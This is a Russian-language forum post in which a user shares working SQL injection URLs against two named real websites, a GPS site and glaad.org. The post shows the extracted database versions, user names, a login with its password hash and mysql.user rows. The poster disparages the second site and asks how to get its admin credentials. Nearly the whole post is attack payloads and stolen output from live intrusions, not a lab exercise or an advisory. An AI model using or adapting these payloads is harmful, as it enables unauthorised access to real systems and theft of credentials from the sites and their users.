|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
С нами:
9688243
Репутация:
75
|
|
Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),0x3a,user(),0x3a,database())/*
4.1.20 : grantsps@localhost : grantsps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,id,login,password)+from+users/*
1 : off-docnescott : 977dd41592714ff1b63f9ea806c6e150
gnutella
правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)
есть еще вот такое срамотный сайт:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,version (),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20/*
>> 4.0.12-standard : glaad@localhost : glaad_www_1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user+limit+0,1/*
>> root:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,host) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+limit+0,1/*
>> andy : 66.28.254.%
вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая.... |